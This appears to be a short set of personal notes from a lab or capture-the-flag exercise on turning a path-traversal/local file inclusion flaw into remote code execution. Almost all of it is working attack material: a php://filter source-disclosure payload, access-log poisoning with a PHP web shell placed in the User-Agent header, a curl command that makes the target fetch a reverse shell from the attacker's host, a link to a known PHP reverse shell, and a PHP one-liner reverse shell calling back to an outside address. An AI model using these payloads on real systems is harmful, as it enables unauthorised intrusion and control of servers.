php://filter/read=convert.base64-encode/resource=./dog/../index
curl -s "http://10.10.197.237/?view=./dog/../../../../var/log/apache2/access.log&ext

php reverse shell PHP
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

curl -A "<?php file_put_contents('reverse.php', file_get_contents('http://10.10.8.233:8080/reverse.php')); ?>" \
   "http://10.10.208.134/?view=./dog/../../../../var/log/apache2/access.log&ext"
  
  
  path traversal / lfi to rce
  
Burp Suite
GET /?view=php://filter/resource=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=whoami HTTP/1.1
Host: 10.10.208.134
User-Agent: <?php system($_GET['cmd']);?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

php reverse shell
php -r '$sock=fsockopen("10.10.8.233",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
